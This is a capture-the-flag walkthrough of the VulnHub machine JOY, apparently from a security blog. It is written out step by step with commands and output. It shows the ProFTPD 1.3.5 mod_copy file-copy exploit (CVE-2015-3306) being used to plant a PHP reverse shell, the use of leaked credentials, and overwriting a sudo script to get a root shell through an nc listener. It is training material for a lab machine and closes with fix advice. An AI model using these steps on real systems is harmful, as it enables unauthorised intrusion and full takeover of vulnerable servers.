Back to the mountains and rivers, treading the clear breeze and bright moon
Download: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
Host discovery & port scanning
Browsing to the web service directly leaks its version information.
An exploit search for that version turns up only a denial-of-service, which gives no shell, so we change approach.
A full port scan with service detection shows that FTP allows anonymous login:
nmap -sS 10.10.10.198 -T4 -p- -A
Log in to FTP as anonymous
ftp 10.10.10.198
# user anonymous, empty password: just press Enter
Two files are listed, reminder and directory; download both
get reminder
get directory
chmod +x does nothing useful here: both are plain text files, not executables, so just read them.
cat directory: it is a listing of user patrick's home directory. Note the version_control file, the .ssh directory, and the script directory owned by root with mode d--------- (nobody but root can enter it); that last one matters later.
Patrick's Directory
total 132
drwxr-xr-x 18 patrick patrick 4096 Feb 4 21:20 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:15 1kd8va0o50OV3H28HZ26ffN7JMeU0wG8J996ftHpRuQrAAQqKoxQfCs5aB8GFXC7.txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 20:55 6kK0S15FpM4iECwlY9vBMOcz0WHalkAEQZIHFBUDxztRq1We1v5GYxAMdxMbUba6.txt
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:15 aOY5oYk9g0WS0nXasU6l2EvjrFCl4hqk.txt
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
-rw-r--r-- 1 patrick patrick 0 Feb 4 20:50 chTSFHiKgRfHiwgp8LV9u4tDwhpdGnKp.txt
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:20 Dp9d3TstWJP6Yczetnrx4GnQgkVE250L.txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 20:50 gAOnh9TLwMyOEViffEXpFAt3LcChEuxcWeqc3BPcQFIRomrGdizTYKuJlHuOSF4z.txt
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:05 obzvvHxWWlOzg8z8uOdy2Qd94dVMZAs2glSOp18HRCRl9jqmB4x5PVoqLsqM0sAD.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:05 Q9lbdQPPywIiNT5Dagi0Bg9OMx0CQ0ts.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:20 UKwKOJqE9XVI3TaEvKZJr8CWu1kVXOWTFZQqjhaiES7QydPE1KEcY2bzuLsOpnYc.txt
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:00 V56ziCPycMNIbNplkqYedQXlM6G9YO66.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 0 Feb 4 21:10 Wp2Twcw4FWSRMYDe8mniQ1BZhHyhYHqX.txt
-rw-r--r-- 1 patrick patrick 0 Feb 4 20:55 XFsA7qBE2voGAtiuZfQ0GQMxE8RitITZ.txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:10 YbxpYyx2v9VnifKxuctWG1Y3BzXp8dGJrQrlXbDHK0qp0ZcBRudy7zzN2g8Rxc9F.txt
-rw-r--r-- 1 patrick patrick 24 Feb 4 21:00 YPE8Q4kbBE98OJCytjadCwhK2W9TMb5UPnCP0cHnGsS2dvpwXrppfAViwZmPH3Zq.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
The other file, reminder, probably isn't useful yet. The listing also shows a file named version_control that contains version information.
┌──(root㉿kali)-[/data/demo]
└─# cat reminder
Lock down this machine!
Continue information gathering with a directory scan (it finds nothing exploitable):
dirsearch -u http://10.10.10.198/ossec/
The way forward is the ProFTPD mod_copy file-copy vulnerability (CVE-2015-3306, SITE CPFR / SITE CPTO in ProFTPD 1.3.5): the server copies any file it can read to any path it can write, on behalf of a client that has not even logged in. Use it to copy version_control into the FTP upload directory, where the anonymous account can download it.
Related reading: https://www.freebuf.com/column/209238.html
┌──(root㉿kali)-[~]
└─# telnet 10.10.10.198 21
Trying 10.10.10.198...
Connected to 10.10.10.198.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
quit
221 Goodbye.
Connection closed by foreign host.
Log in to the FTP server again and the copied file is now listed
# download it
get version_control
This confirms the service version: ProFTPd 1.3.5
┌──(root㉿kali)-[~]
└─# cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
Grab the public exploit, copy it to the current directory and run it
searchsploit -m 36803
python2 36803.py
The script hangs at this point.
Reading the script shows why: it writes its payload into a hard-coded webroot. On this machine that directory is different; the version_control file we just retrieved says the webroot is /var/www/tryingharderisjoy.
Even with the path corrected the script still fails. Metasploit can exploit this too, but we will not go into that here and continue by hand.
Now that we know the webroot is /var/www/tryingharderisjoy, the same file-copy bug does the job: upload php-reverse-shell.php (from /usr/share/webshells/php, with the listener address and port set to the Kali host) to the FTP upload directory, then copy it into the webroot. The upload itself is not shown; the copy is:
┌──(root㉿kali)-[/usr/share/webshells/php]
└─# telnet 10.10.10.198 21
Trying 10.10.10.198...
Connected to 10.10.10.198.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/php-reverse-shell.php
350 File or directory exists, ready for destination name
site cpto /var/www/tryingharderisjoy/php-reverse-shell.php
250 Copy successful
quit
221 Goodbye.
Connection closed by foreign host.
Request the copied file over HTTP and the reverse shell connects back to the listener.
Now privilege escalation. In the ossec directory under the webroot there is a file named patricksecretsofjoy containing credentials (next to an .htpasswd holding an Apache MD5 hash):
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -al
ls -al
total 116
drwxr-xr-x 8 www-data www-data 4096 Jan 6 2019 .
drwxr-xr-x 3 www-data www-data 4096 Feb 4 22:41 ..
-rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags
-rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd
-rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35745 Jul 19 2016 LICENSE
-rw-r--r-- 1 www-data www-data 2106 Jul 19 2016 README
-rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search
drwxr-xr-x 3 www-data www-data 4096 Jul 19 2016 css
-rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 img
-rwxr-xr-x 1 www-data www-data 5177 Jul 19 2016 index.php
drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 js
drwxr-xr-x 3 www-data www-data 4096 Dec 28 2018 lib
-rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data 2471 Jul 19 2016 setup.sh
drwxr-xr-x 2 www-data www-data 4096 Dec 28 2018 site
drwxrwxrwx 2 www-data www-data 4096 Feb 4 21:32 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat .htpasswd
cat .htpasswd
admin:$apr1$3Jv2Ok6H$4BMdXenVBmD2E3kXe8RVL.
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su root
su root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick
su patrick
Password: apollo098765
patrick@JOY:/var/www/tryingharderisjoy/ossec$ whoami
whoami
patrick
With patrick's password, sudo -l shows that patrick may run /home/patrick/script/test as root, so that script is the escalation path. But the script directory is mode d--------- and owned by root, so patrick can neither enter it nor edit the file.
Remember how we got in: the same arbitrary file-copy bug can overwrite that file, because the copy is performed by the FTP daemon with its own privileges, which on this box are enough to write into a directory only root can enter. Write the payload into patrick's home first:
cd ~
echo 'php /var/www/tryingharderisjoy/php-reverse-shell.php' > test
On Kali, copy it over the sudo-able script:
┌──(root㉿kali)-[~]
└─# telnet 10.10.10.198 21
Trying 10.10.10.198...
Connected to 10.10.10.198.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/test
350 File or directory exists, ready for destination name
site cpto /home/patrick/script/test
250 Copy successful
quit
221 Goodbye.
Connection closed by foreign host.
On the target, run the script through sudo; it now launches the reverse shell as root:
sudo /home/patrick/script/test
On Kali, the listener receives the root shell:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.198] 44710
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
23:13:50 up 2:28, 0 users, load average: 0.04, 0.05, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
#
Privilege escalation complete. The root cause is a ProFTPD 1.3.5 build whose mod_copy answers SITE CPFR/CPTO before login; the version_control note already said "upgrade ProFTPd", and 1.3.5a fixes CVE-2015-3306 (or simply leave mod_copy out). The sudo rule on a script inside a root-only directory offered no protection once that daemon could write there.
Originally published on the WeChat public account 泷羽Sec: [OSCP] JOY, privilege escalation via the ProFTPd copy vulnerability